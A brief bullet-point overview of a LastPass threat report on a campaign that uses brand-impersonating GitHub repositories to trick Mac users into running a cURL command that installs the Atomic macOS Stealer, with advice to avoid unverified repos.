Overview

• LastPass’s threat team reports a widespread, active campaign that targets Mac users through brand‑impersonating repositories on GitHub.
• Two GitHub pages impersonating LastPass, posted on September 16 by the user “modhopmduck476,” were taken down after being reported.
• Victims are funneled from fake project pages to macprograms-pro[.]com, where instructions prompt a Terminal cURL command to fetch an encoded payload.
• The payload installs the Atomic macOS Stealer (AMOS), with operators rotating GitHub usernames and leveraging SEO to resurface after takedowns.
• Researchers published indicators of compromise and examples of impersonated tools and services, urging users to avoid unverified repos and to not paste commands from untrusted pages.